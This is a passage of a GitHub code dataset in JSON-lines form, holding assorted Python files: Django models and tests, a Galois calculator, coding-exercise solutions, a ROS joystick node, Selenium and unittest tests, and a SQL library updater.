\"uncertainty\": \"uncertainty\",\n \"tumor_type\": \"tumor_type\",\n \"extrapolation_method\": \"extrapolation_method\",\n \"evidence\": \"evidence\",\n \"comments\": \"comments\",\n \"extra\": \"extra\",\n }\n data = self.select_related(\"assessment__details\").values_list(*list(mapping.keys()))\n df = pd.DataFrame(data=data, columns=list(mapping.values())).sort_values(\n [\"assessment_id\", \"value_id\"]\n )\n map_enum(df, \"project_status\", constants.Status, replace=True)\n map_enum(df, \"peer_review_status\", constants.PeerReviewType, 
replace=True)\n map_enum(df, \"evaluation_type\", constants.EvaluationType, replace=True)\n map_enum(df, \"value_type\", constants.ValueType, replace=True)\n map_enum(df, \"confidence\", constants.Confidence, replace=True)\n return df\n\n\nclass AssessmentDetailManager(BaseManager):\n assessment_relation = \"assessment\"\n\n\nclass Event(NamedTuple):\n \"\"\"A potentially collapsed change event between Logs and Reversions\"\"\"\n\n message: str\n snapshot: str\n user: Any\n created: datetime\n\n\nclass EventPair:\n \"\"\"An Event Pair Comparison between a Log and a Version\"\"\"\n\n def __init__(self, item_1, item_2=None):\n \"\"\"Build an event pair, or at least one event.\n\n Args:\n item_1 (Union[Log, Version]): The first item in the pair\n item_2 (Union[Log, Version], optional): The optional second item in the pair\n \"\"\"\n self.log = None\n self.version = None\n if isinstance(item_1, Version):\n self.version = item_1\n else:\n self.log = item_1\n if item_2:\n if isinstance(item_2, Version):\n self.version = item_2\n else:\n self.log = item_2\n\n def collapsable(self) -> bool:\n # should the two items be collapsed?\n if self.log is None or self.version is None:\n return False\n return abs(self.log.created - self.version.revision.date_created) < timedelta(seconds=10)\n\n def output(self) -> Event:\n # Return a collapsed event\n return Event(\n message=self.log.message if self.log else \"\",\n snapshot=self.version.serialized_data if self.version else \"\",\n user=self.log.user if self.log else self.version.revision.user,\n created=self.log.created if self.log else self.version.revision.date_created,\n )\n\n\nclass LogManager(BaseManager):\n assessment_relation = \"assessment\"\n\n def get_object_audit(self, content_type: ContentType | int, object_id: int) -> list[Event]:\n \"\"\"\n Combines information from HAWC's internal logs and reversion logs for a more complete audit.\n Matching is attempted between these two log types to account for same operations.\n\n Args:\n content_type (Union[ContentType, int]): Content type of interested object.\n object_id (int): ID of interested object.\n\n Returns:\n list[Event]: Serialized logs with message, snapshot, user, and date created.\n \"\"\"\n # sort all events in descending order\n logs = (\n self.filter(content_type=content_type, object_id=object_id)\n .select_related(\"user\")\n .order_by(\"id\")\n )\n versions = (\n Version.objects.filter(content_type=content_type, object_id=object_id)\n .select_related(\"revision__user\")\n .order_by(\"id\")\n )\n events = list(logs) + list(versions)\n events.sort(\n key=lambda el: el.created if isinstance(el, self.model) else el.revision.date_created,\n reverse=True,\n )\n\n # build event aggregations\n aggregations = []\n used_next_event = None\n for i, this_event in enumerate(events):\n # skip current item if we've already used it\n if this_event is used_next_event:\n continue\n\n # try to get next event to compare; if we don't have one, add the current\n try:\n next_event = events[i + 1]\n except IndexError:\n aggregations.append(EventPair(this_event).output())\n break\n\n # run pair comparisons\n pair = EventPair(this_event, next_event)\n if pair.collapsable():\n # add both; mark second as consumed\n aggregations.append(pair.output())\n used_next_event = next_event\n else:\n # just add one\n aggregations.append(EventPair(this_event).output())\n\n return aggregations\n","repo_name":"shapiromatron/hawc","sub_path":"hawc/apps/assessment/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
+{"seq_id":"73829273193","text":"import tools\nfrom IrreduciblePreloader import IrreduciblePreloader\nfrom PolyGalois2m import PolyGalois2m\n\n\nclass FrontToBackConnector:\n myPreloader = None\n myGUI = None\n\n def __init__(self, connector):\n \"\"\"\n Instantiates the preloader and passes this instance back to the Launcher, so a link can be established.\n :param connector: Empty list used to return a reference to this instance\n \"\"\"\n connector.append(self)\n self.myPreloader = IrreduciblePreloader()\n\n def checkIfSupported(self, m):\n \"\"\"\n Checks if the m provided corresponds to a supported GF(2^m)\n :param m: int\n :return: (True, irreducible coefficients) if supported, False otherwise\n \"\"\"\n if m in self.myPreloader.dict:\n return True, self.myPreloader.dict[m]\n else:\n return False\n\n def treatEntry(self, entry):\n \"\"\"\n Takes an input from the user in string form, which may be binary or hex,\n and converts it to a binary list\n :param entry: pair of (numeric base, value string)\n :return: List of 0 and 1 coefficients representing the polynomial that was entered\n \"\"\"\n if entry[0] == 16:\n entry[1] = tools.hexToBin(entry[1])\n else:\n entry[1] = list(entry[1])\n entry[1] = tools.charListToIntList(entry[1])\n return entry[1]\n\n def calculate(self, mode, filledFields, m):\n \"\"\"\n Relays user input to the backend in a suitable format\n :param mode: int representing the operation requested by the user\n :param filledFields: list of tuples, each of which describes an input field value and base\n :param m: int for the m in GF(2^m)\n \"\"\"\n treatedEntries = []\n for i in range(len(filledFields)):\n treatedEntries.append(self.treatEntry(filledFields[i]))\n irreducibleCoeffs = self.myPreloader.dict[m]\n polynomials = [PolyGalois2m(coeffs, m, irreducibleCoeffs) for coeffs in treatedEntries]\n irreducibleSt = tools.stringifyBinList(irreducibleCoeffs)\n\n # Adding two polynomials\n if mode == 0:\n result = polynomials[0] + polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Subtracting two polynomials\n elif mode == 1:\n result = polynomials[0] - polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Multiplying two polynomials\n elif mode == 2:\n result = polynomials[0] * polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Dividing two polynomials\n elif mode == 3:\n result = polynomials[0] / polynomials[1]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Inverting a polynomial\n elif mode == 4:\n result = polynomials[0].findInverse()\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n # Reducing a polynomial modulo the irreducible polynomial\n elif mode == 5:\n result = polynomials[0]\n self.myGUI.updateResult(tools.binListToDec(result.numPoly.coeffs), irreducibleSt)\n","repo_name":"anthonyjsaab/Galois-Calculator","sub_path":"src/FrontToBackConnector.py","file_name":"FrontToBackConnector.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15145562619","text":"y, m, d = map(int, input().split('/'))\r\n\r\ndef leap_year(y):\r\n if y % 400 == 0:\r\n return True\r\n if y % 100 == 0:\r\n return False\r\n if y % 4 == 0:\r\n return True\r\n return False\r\n\r\nlims = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\r\n\r\nwhile m <= 12:\r\n lim = lims[m]\r\n if leap_year(y) and m == 2:\r\n lim += 1\r\n while d <= lim:\r\n if y % (m * d) == 0:\r\n print(\"{year:02d}/{month:02d}/{date:02d}\".format(year=y, month=m, date=d))\r\n exit()\r\n d += 1\r\n d = 1\r\n m += 1\r\nprint(\"{year:02d}/{month:02d}/{date:02d}\".format(year=y+1, month=1, date=1))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc002/B/4818502.py","file_name":"4818502.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
+{"seq_id":"42112616334","text":"\nwhile True:\n direita = 0\n esquerda = 0\n direcao = 0\n\n nComandos = int(input(\"Enter the number of commands given by the sergeant: \"))\n \n if nComandos == 0:\n break\n\n ordem = input('Enter the commands: ').upper()\n \n for i in ordem:\n if i == 'D':\n direita += 1\n if i == 'E':\n esquerda += 1\n\n direcao = direita - esquerda\n direcao = direcao % 4\n\n if direcao == 0:\n print('N')\n elif direcao == 1:\n print('L')\n elif direcao == 2:\n print('S')\n elif direcao == 3:\n print('O')\n \n\n#print('d',direita)\n#print('e',esquerda)\n\n","repo_name":"medeirosJose/UFSC","sub_path":"2023.1/INE5603 - Introdução à POO/Lista 07 - Strings/Exercício1.py","file_name":"Exercício1.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"36780944970","text":"import sys\nfrom rec_utils import *\n\n\ndef main():\n \"\"\" factor, fr, counts_thr, area_list, subject, area, mode, mode_seed, [overwrite] \"\"\"\n args_version = sys.argv[1:]\n # args_version = ['job_id=0', 'overwrite=True']\n version = job_scheduler(args_version, args_from_parse_func)\n\n # create analysis object\n dpca = DemixedPrincipalComponent(DataBase(['units', 'events', 'conditions']), version)\n db, md = dpca.db, dpca.db.md\n\n # overwrite check\n target_filename = dpca.get_path_base('pbt', dpca.get_exec_stem())\n print(target_filename)\n if path.exists(target_filename) and ('overwrite' not in version.keys() or not eval(version['overwrite'])):\n exit()\n\n # load behavioral units from filter\n behavioral_units_filter = md.np_loader(dpca.get_path_base('filter', dpca.get_filter_stem()))\n\n # init params\n units_index = md.preproc_imports['units']['index']\n events_index = md.preproc_imports['events']['index']\n mode_seed = int(dpca.version['mode_seed'])\n area = dpca.version['area']\n v_factor_params = factor_generate_conditions(dpca.version['factor'])\n assembly_condition_columns = v_factor_params['condition_columns']\n balance_condition_columns = v_factor_params['balance_columns']\n counts_thr = int(dpca.version['counts_thr'])\n\n # process\n # get behavioral unit indices\n buf_units = list(set(zip_columns(behavioral_units_filter, units_index)))\n # filter units table with behavioral units\n db.tables['units'] = db.tables['units'].loc[buf_units]\n units = db.tables['units']\n\n if dpca.version['mode'] == 'AreaShuffle':\n # shuffle area labels and take shuffled area units indices\n units['AreaShuffle'] = list(units['Area'].sample(frac=1, random_state=mode_seed)) if mode_seed else units['Area']\n area_units = units.loc[units['AreaShuffle'].eq(area)].index\n elif dpca.version['mode'] == 'Bootstrap':\n # get min size of areas, calculate fraction to subsample, get area units indices subsampled (constant seed)\n area_counts =
units['Area'].value_counts()\n min_size = area_counts.loc[list_param_to_list(dpca.version['area_list'])].min()\n area_units = units.loc[units['Area'].eq(area)].sample(min_size, random_state=0).index\n elif dpca.version['mode'] == 'Full':\n area_units = units.loc[units['Area'].eq(area)].index\n\n # TODO: modifications for replacement sampling of units, correct later\n area_units_df = pd.DataFrame(area_units, columns=['Unit'])\n area_units_df = unzip_columns(area_units_df, 'Unit', units_index)\n area_units_df['Unit_Code'] = area_units_df.index\n\n # isolate behavioral units of area selection\n area_behavioral_units = pd.merge(behavioral_units_filter, area_units_df, on=units_index)\n # merge with condition columns\n events_conditions = db.tables['events_conditions'][assembly_condition_columns].reset_index()\n area_behavioral_units_conditions = pd.merge(area_behavioral_units, events_conditions, on=events_index)\n # groupby units x conditions\n area_conditions_grouper = area_behavioral_units_conditions.groupby(units_index + ['Unit_Code'] + assembly_condition_columns)\n # sample counts_thr events for every unit x condition (replace for Bootstrap)\n behavioral_units = area_conditions_grouper.sample(counts_thr,\n random_state=mode_seed,\n replace=dpca.version['mode'] == 'Bootstrap')\n\n condition_columns = [col for col in assembly_condition_columns if not col in balance_condition_columns]\n behavioral_units.drop(balance_condition_columns, axis=1, inplace=True)\n pbt = pbt_from_behavioral_units(condition_columns, version['fr'], behavioral_units, db)\n\n md.np_saver(pbt, target_filename)\n\n\ndef args_from_parse_func(parse_version):\n\n args_version_list = []\n\n # for area_list, area in [('PFC', 'PFC'), ('Stri', 'Stri'), ('IT', 'IT')]:\n # for subject in ['Gonzo', 'Oscar', 'Gonzo_Oscar']:\n # for factor, counts_thr in [('GatedStimulusPostDistMemory', '6'), ('GatedStimulusPostDistMemory', '8'),\n # ('GatedStimulusPostDistMemory', '10'), ('GatedStimulusPostDistMemory', '12')]:\n # args_factor = ['factor={0:s}'.format(factor)]\n # args_fr = ['fr=ConcatFactor2']\n # args_counts_thr = ['counts_thr={0:s}'.format(counts_thr)]\n # args_area_list = ['area_list={0:s}'.format(area_list)]\n # args_subject = ['subject={0:s}'.format(subject)]\n # args_area = ['area={0:s}'.format(area)]\n # args_mode = ['mode=Full']\n # args_mode_seed = ['mode_seed={0:d}'.format(ii) for ii in range(1)]\n # args_version_list.extend(list(map(list, list(product(args_factor, args_fr, args_counts_thr, args_area_list,\n # args_subject, args_area, args_mode, args_mode_seed)))))\n\n for area_list, area in [('PFC', 'PFC'), ('Stri', 'Stri'), ('IT', 'IT')]:\n for subject in ['Gonzo', 'Oscar', 'Gonzo_Oscar']:\n for counts_thr in ['10', '12']:\n # for factor in ['GatPostStimulusRuleStim', 'TargPostStimulusRuleStim',\n # 'GatingPreBool', 'StimulusGating', 'StimulusGatingPreBool']:\n for factor in ['StimulusGatingNoTarget']:\n args_factor = ['factor={0:s}'.format(factor)]\n args_fr = ['fr=ConcatFactor2']\n args_counts_thr = ['counts_thr={0:s}'.format(counts_thr)]\n args_area_list = ['area_list={0:s}'.format(area_list)]\n args_subject = ['subject={0:s}'.format(subject)]\n args_area = ['area={0:s}'.format(area)]\n args_mode = ['mode=Full']\n args_mode_seed = ['mode_seed={0:d}'.format(ii) for ii in range(20)]\n args_version_list.extend(list(map(list, list(product(args_factor, args_fr, args_counts_thr, args_area_list,\n args_subject, args_area, args_mode, args_mode_seed)))))\n\n args_version_from_job = 
args_version_list[int(parse_version['job_id'])]\n if 'overwrite' in parse_version.keys():\n args_version_from_job.append('overwrite={0:s}'.format(parse_version['overwrite']))\n\n return args_version_from_job\n\n\nmain()\n","repo_name":"pkollias/GatingInWorkingMemory","sub_path":"dpca_assemble.py","file_name":"dpca_assemble.py","file_ext":"py","file_size_in_byte":6487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19824430344","text":"from django.test import TestCase\n\nfrom rest_fhir.models import Resource\n\n\nclass ResourceTestCase(TestCase):\n def test_create_resource(self):\n resource_content = {\n 'resourceType': 'Patient',\n 'name': [\n {\n 'use': 'official',\n 'family': 'Donald',\n 'given': [\n 'Duck',\n ],\n }\n ],\n }\n\n resource = Resource()\n resource.save(resource_content=resource_content)\n\n resource_content_with_id = dict(\n id=str(resource.id),\n **resource_content,\n )\n\n self.assertEqual(resource.resource_type, 'Patient')\n self.assertEqual(resource.version_id, 1)\n self.assertEqual(resource.version.version_id, resource.version_id)\n self.assertEqual(\n resource.version.resource_content, resource_content_with_id\n )\n self.assertEqual(resource.published_at, resource.version.published_at)\n self.assertEqual(resource.updated_at, resource.version.published_at)\n\n self.assertEqual(resource.history.count(), 1)\n self.assertEqual(resource.version, resource.history.first())\n\n def test_update_resource(self):\n # Creating the resource\n resource_content = {\n 'resourceType': 'Organization',\n 'name': 'XYZ Insurance',\n 'alias': [\n 'ABS Insurance',\n ],\n }\n resource = Resource()\n resource.save(resource_content=resource_content)\n first_version_obj = resource.version\n\n # Updating the resource\n resource_content_updated = {\n 'resourceType': 'Organization',\n 'name': 'ACME Healthcare',\n 'alias': [\n 'ACME',\n 'ACME Clinical Lab',\n ],\n }\n resource_content_updated_with_id = dict(\n id=str(resource.id),\n **resource_content_updated,\n )\n resource.save(resource_content=resource_content_updated)\n last_version_obj = resource.version\n\n self.assertIsNotNone(resource.version_id, 2)\n self.assertEqual(\n last_version_obj.resource_content, resource_content_updated_with_id\n )\n self.assertEqual(resource.published_at, first_version_obj.published_at)\n self.assertEqual(resource.updated_at, last_version_obj.published_at)\n self.assertEqual(resource.history.count(), 2)\n self.assertEqual(first_version_obj, resource.history.first())\n self.assertEqual(last_version_obj, resource.history.last())\n\n def test_delete_resource(self):\n resource_content = {\n 'resourceType': 'Location',\n 'name': 'South Wing, second floor',\n 'description': 'Second floor of the Old South Wing, formerly in use by Psychiatry',\n }\n\n resource = Resource()\n resource.save(resource_content=resource_content)\n version = resource.version\n\n num_objs_deleted, per_obj_deleted = resource.delete()\n\n self.assertEqual(num_objs_deleted, 2)\n self.assertEqual(\n per_obj_deleted,\n {\n 'rest_fhir.Resource': 1,\n 'rest_fhir.ResourceVersion': 1,\n },\n )\n\n self.assertIsNotNone(resource.deleted_at)\n self.assertEqual(resource.history.count(), 2)\n\n [first_version, deleted_version] = resource.history.all()\n\n self.assertEqual(version, first_version)\n self.assertIsNotNone(deleted_version.deleted_at)\n self.assertIsNone(deleted_version.resource_content)\n self.assertIsNotNone(resource.deleted_at, 
deleted_version.deleted_at)\n","repo_name":"weynelucas/django-rest-fhir","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8762208844","text":"import shutil\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom AccessSql import SQL\nfrom Env import Env as env\n\n\nclass UpdateDB:\n def __init__(self, log, out_dir):\n self.log = log\n self.mysql = SQL(env.USER, env.PWD, env.HOST, env.DB)\n self.out_dir = Path(out_dir) if isinstance(out_dir, str) else out_dir\n\n def update_db(self, title_df, chpt_df, page_df, _type=\"image\"):\n for i, entry in tqdm(title_df.iterrows(), total=title_df.shape[0], desc=\"Updating Database\"):\n self.log.debug(f\"Updating SQL entry for Title: {entry['title']}\")\n self._update_lib(entry)\n\n c_df = chpt_df.loc[chpt_df['item_id'] == entry['item_id']]\n list_of_c_ids = c_df['chpt_id'].tolist()\n self._update_chapt(c_df)\n\n if _type == \"image\":\n p_df = page_df.loc[page_df['chpt_id'].isin(list_of_c_ids)]\n self._update_pages(p_df)\n self._copy_files(c_df, p_df, entry['cover_path'])\n else:\n self.log.warning(\"Not implemented for Video Yet.\")\n\n def _copy_files(self, c_df, p_df, cover_path):\n for chapter in c_df.itertuples():\n page_dir = self.out_dir / str(chapter.item_id) / str(chapter.chpt_id)\n page_dir.mkdir(parents=True, exist_ok=True)\n\n pages = p_df.loc[p_df['chpt_id'] == chapter.chpt_id].copy()\n for page in pages.itertuples():\n shutil.copy(page.src_path, page_dir / Path(page.page_path).name)\n\n shutil.copy(cover_path, self.out_dir / str(c_df.iloc[0]['item_id']) / f'cover{Path(cover_path).suffix}')\n\n def _update_pages(self, page_df):\n q_str = f\"\"\"\n INSERT INTO Pages(PageId, Path, ChptId, ImgType)\n VALUES\n \"\"\"\n val_str = []\n for i, entry in page_df.iterrows():\n val_str.append(f\"({entry['page_id']}, '{entry['page_path']}', {entry['chpt_id']}, '{entry['img_type']}')\")\n\n val_str = \",\".join(val_str)\n q_str = q_str + val_str\n self.mysql.query(q_str)\n self.mysql.set_update()\n\n def _update_chapt(self, chpt_df):\n q_str = f\"\"\"\n INSERT INTO Chapters(ChptId, ChapterNo, TotalPages, DateCreated, ItemId, ChapterTitle)\n VALUES\n \"\"\"\n val_str = []\n for i, entry in chpt_df.iterrows():\n val_str.append(f\"({entry['chpt_id']}, {entry['chpt_no']}, {entry['total_pages']}, \"\n f\"'{entry['date_created']}', {entry['item_id']}, '{entry['chpt_title']}')\")\n\n val_str = \",\".join(val_str)\n q_str = q_str + val_str\n self.mysql.query(q_str)\n self.mysql.set_update()\n\n def _update_lib(self, entry):\n assert entry['cover_path'] is not None, f\"Cover Path is None for Entry: {entry['title']}\"\n q_str = f\"\"\"\n INSERT INTO Library_Items(ItemId, Title, Maker, ItemType, DateCreated, CoverPath, TotalEntries)\n VALUES\n ({entry['item_id']}, '{entry['title']}', '{entry['maker']}', '{entry['item_type']}', '{entry['date_created']}', \n 'comic/{entry['item_id']}/cover{entry['cover_path'].suffix}', {entry['total_entries']})\n \"\"\" if not entry['item_exist'] else f\"\"\"\n UPDATE Library_Items\n SET DateCreated='{entry['date_created']}', TotalEntries={entry['total_entries']}\n WHERE ItemId={entry['item_id']}\n \"\"\"\n self.mysql.query(q_str)\n 
self.mysql.set_update()\n","repo_name":"SKJTCodes/updateComic","sub_path":"UpdateDB.py","file_name":"UpdateDB.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"74402477031","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\n\n # Author: Bogdan Catangiu\n # This ROS Node converts Joystick inputs from the joy node\n # into commands for bookshelf_robot\ndef callback(data):\n twist = Twist()\n if data.buttons[4] == 1: #slow movement\n twist.linear.x = 0.1*data.axes[1]\n twist.angular.z = -0.1*data.axes[0]\n else: # fast movement\n twist.linear.x = 2*data.axes[1]\n twist.angular.z = -2*data.axes[0]\n pub.publish(twist)\n\n # Initializes everything\ndef start():\n # publishing to \"/cmd_vel\" to control bookshelf_robot base\n global pub\n rospy.init_node('joy_to_twist')\n pub = rospy.Publisher('cmd_vel', Twist, queue_size = 10)\n # subscribed to joystick inputs on topic \"joy\"\n rospy.Subscriber(\"joy\", Joy, callback)\n # starts the node\n rospy.spin()\n\nif __name__ == '__main__':\n start()\n \n","repo_name":"BogdanCATANGIU/Knock_Robot","sub_path":"src/joy_to_twist.py","file_name":"joy_to_twist.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"21387734609","text":"# Exercise 5. Write a program that asks the user to enter\n# integers from the keyboard until the number 0 is entered,\n# then stop. Compute the sum of the even numbers and the\n# sum of the odd numbers that were entered.\n\ndef main():\n n = int(input('Enter an integer, enter 0 to finish: '))\n odd_sum = 0\n even_sum = 0\n while n != 0:\n if n % 2 == 0:\n even_sum += n\n else:\n odd_sum += n\n n = int(input())\n print(f'Sum of the even numbers: {even_sum}')\n print(f'Sum of the odd numbers: {odd_sum}')\n\nmain()\n\n","repo_name":"tiendat01/source-subject-hust","sub_path":"Python-learn-IT3150-ProjectI/ly-thuyet-TinDC-byPython/chuong4/bt-loop/bt5.py","file_name":"bt5.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"11190272693","text":"# When up to 100 integers are entered as keys\n\n# 1. Implement a max heap\n\ndef enq(n):\n global last\n last += 1\n tree[last] = n # keep the complete binary tree shape\n\n # restore the max-heap property\n child = last\n parent = child // 2 # parent node number in the complete binary tree\n while tree[parent] < tree[child] and parent >= 1: # while the child's key is larger\n tree[parent], tree[child] = tree[child], tree[parent] # swap positions\n child = parent\n parent = child // 2\n\ndef deq(): # delete\n global last\n tmp = tree[1]\n tree[1] = tree[last]\n last -= 1\n #-------- after the deletion, repositioning is done\n # ------- to keep the max heap, check whether parent > child and swap\n parent = 1\n left_child = parent * 2 # left child\n cur_child = left_child # cur_child is currently the left child\n right_child = left_child + 1\n while cur_child <= last: # while there is a child to compare\n # if a right child exists and it is larger than the left child\n if right_child <= last and tree[left_child] < tree[right_child]:\n cur_child = right_child # compare right child with parent\n\n if tree[parent] < tree[cur_child]: # swap if the child's key is larger\n tree[parent], tree[cur_child] = tree[cur_child], tree[parent]\n # move parent down\n parent = cur_child\n cur_child = parent*2\n else:\n break\n return tmp\n\n\n\n\n\n# complete binary tree nodes 1 ~ 100\nV = 100\ntree = [0]*(V+1)\n\n# track the last node number\nlast = 0\n\nenq(3)\nenq(2)\nenq(4)\nenq(7)\nenq(5)\nenq(1)\n# print(tree[1])\nenq(9)\n# print(tree[1])\nwhile last > 0:\n print(deq(), tree[1])\n","repo_name":"jisy2718/_algorithm","sub_path":"정리할것들/0316_tree연습/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"34660019758","text":"import pytest\nfrom selenium.webdriver.common.by import By\nimport time\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\n\ncases = [\n (\"es\", \"Añadir al carrito\",),\n (\"fr\", \"Ajouter au panier\",),\n (\"ru\", \"Добавить в корзину\",),\n (\"en\", \"Add to basket\",),\n]\n\nids = [x[0] for x in cases]\n\n@pytest.mark.parametrize(\"language, want\", cases,ids=ids)\ndef test_basket_btn(browser,user_language,language,want):\n if language != user_language:\n pytest.skip(f\"skip {language} language\")\n \n browser.get(link)\n browser.implicitly_wait(10)\n \n btn = browser.find_element(By.XPATH,\"//*[@class='btn btn-lg btn-primary btn-add-to-basket']\")\n got = btn.text\n assert want == got, f\"want '{want}', got '{got}'\"\n time.sleep(5)\n","repo_name":"Arizzzzzona/test_items_hw","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"35084657864","text":"#!/usr/bin/env python3\n\"\"\"Unit tests for utils.access_nested_map and utils.get_json\"\"\"\nimport unittest\nfrom parameterized import parameterized\nfrom unittest.mock import patch, Mock\nfrom utils import access_nested_map, get_json, memoize\n\n\nclass TestAccessNestedMap(unittest.TestCase):\n \"\"\"Test class for access_nested_map function\"\"\"\n\n @parameterized.expand([\n ({\"a\": 1}, (\"a\",), 1),\n ({\"a\": {\"b\": 2}}, (\"a\",), {\"b\": 2}),\n ({\"a\": {\"b\": 2}}, (\"a\", \"b\"), 2)\n ])\n def test_access_nested_map(self, nested_map, path, expected_result):\n \"\"\"Test access_nested_map function\"\"\"\n self.assertEqual(access_nested_map(nested_map, path), expected_result)\n\n @parameterized.expand([\n ({}, (\"a\",), KeyError),\n ({\"a\": 1}, (\"a\", \"b\"), KeyError)\n ])\n def test_access_nested_map_exception(\n self, nested_map, path, expected_exception\n ):\n \"\"\"Test access_nested_map function for KeyError\"\"\"\n with self.assertRaises(expected_exception) as context:\n
access_nested_map(nested_map, path)\n self.assertIsInstance(context.exception, expected_exception)\n\n\nclass TestGetJson(unittest.TestCase):\n \"\"\"Test class for get_json function\"\"\"\n\n @parameterized.expand([\n (\"http://example.com\", {\"payload\": True}),\n (\"http://holberton.io\", {\"payload\": False})\n ])\n @patch('utils.requests.get')\n def test_get_json(self, test_url, test_payload, mock_get):\n \"\"\"Test get_json function\"\"\"\n # Configure the Mock object to return test_payload when json() is called\n mock_get.return_value = Mock()\n mock_get.return_value.json.return_value = test_payload\n\n # Call the get_json function with the test URL\n result = get_json(test_url)\n\n # Assert that the mocked requests.get method was called exactly once with the test URL\n mock_get.assert_called_once_with(test_url)\n\n # Assert that the output of get_json is equal to the expected payload\n self.assertEqual(result, test_payload)\n\n\nclass TestClass:\n def a_method(self):\n return 42\n\n _a_property = None\n\n @property\n def a_property(self):\n if self._a_property is None:\n self._a_property = self.a_method()\n return self._a_property\n\n\nclass TestMemoize(unittest.TestCase):\n \"\"\"Test class for memoize decorator\"\"\"\n\n @patch.object(TestClass, 'a_method')\n def test_memoize(self, mock_a_method):\n \"\"\"Test the memoize decorator\"\"\"\n # Configure the mock_a_method to return a specific value\n mock_a_method.return_value = 42\n\n # Create an instance of TestClass\n instance = TestClass()\n\n # Call the a_property method twice\n result1 = instance.a_property\n result2 = instance.a_property\n\n # Assert that the mock_a_method was called exactly once\n mock_a_method.assert_called_once()\n\n # Assert that the results of both calls are the same\n self.assertEqual(result1, 42)\n self.assertEqual(result2, 42)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lamech-byte/alx-backend-python","sub_path":"0x03-Unittests_and_integration_tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"9670344690","text":"import pysam\nimport argparse\nimport os.path\nimport time\nimport pandas as pd\nimport sys\nimport subprocess\nimport importlib\nfrom functools import reduce\nfrom SRAClass import SRA\nfrom GBKClass import GBK\nfrom ProjectClass import Project\n\n\nfrom Bio import SeqIO\n\n\n\ndef parser():\n\tparser = argparse.ArgumentParser()\n\t### Args for processing an accession file\n\tparser.add_argument(\"-p\",'--process', help=\"Option to process data\", dest = \"process\")\n\tparser.add_argument(\"-a\",'--accession', help=\"SRA accession file\", dest = \"accession\")\n\tparser.add_argument(\"-n\",'--name', help=\"SRA accession file descriptive name\", dest = \"name\")\n\tparser.add_argument(\"-g\",'--gbk', help=\"GBK file\", dest = \"gbk\")\n\t### Args for creating a project out of specific accession files\n\tparser.add_argument(\"-u\",'--project', help = \"Option to make a new project (provide name of project here too)\",dest = \"projectname\")\n\tparser.add_argument(\"-q\",'--quick', nargs='+', help = \"Use this option if you are directly providing fcount references, and list the descriptive names of those references\",dest=\"FCountnames\")\n\tparser.add_argument(\"-l\",'--list', nargs='+', help=\"Provide list of descriptive names of accessions or fcount references\",dest=\"list\")\n\tparser.add_argument(\"-k\", '--kegg', help = \"Provide kegg reference file here\", dest = \"kegg\")\n\t## Args for only getting specific things\n\tparser.add_argument(\"-t\", '--get', help = \"Specifies what you want to get. Current Options: GBK amino acid fasta (gbk_fa), GBK nucleotide fasta (gbk_na)\", dest = \"get\")\n\tparser.add_argument(\"-i\", '--input', help = \"Provide input here\", dest = \"input\")\n\targs = parser.parse_args()\n\n\n\treturn(args)\n\n\ndef CacheData(SRA,GBK):\n\tif not os.path.exists(\"/home/kz/Pipeline/cache.txt\"):\n\t\twith open('cache.txt', 'w') as f:\n\t\t\torganization = { \"SRA\" : {}, \"GBK\" : {}}\n\t\t\tSRAObject = SRA.OrganizeData()\n\t\t\tGBKObject = GBK.OrganizeData()\n\t\t\torganization[\"SRA\"].update({SRA.DescriptiveName : {} })\n\t\t\torganization[\"GBK\"].update({GBK.LocusTag : {} })\n\t\t\torganization[\"SRA\"][SRA.DescriptiveName].update(SRAObject)\n\t\t\torganization[\"GBK\"][GBK.LocusTag].update(GBKObject)\n\t\t\tprint(organization,file=f)\n\telse:\n\t\twith open('cache.txt', 'r+') as f:\n\t\t\tcontent = 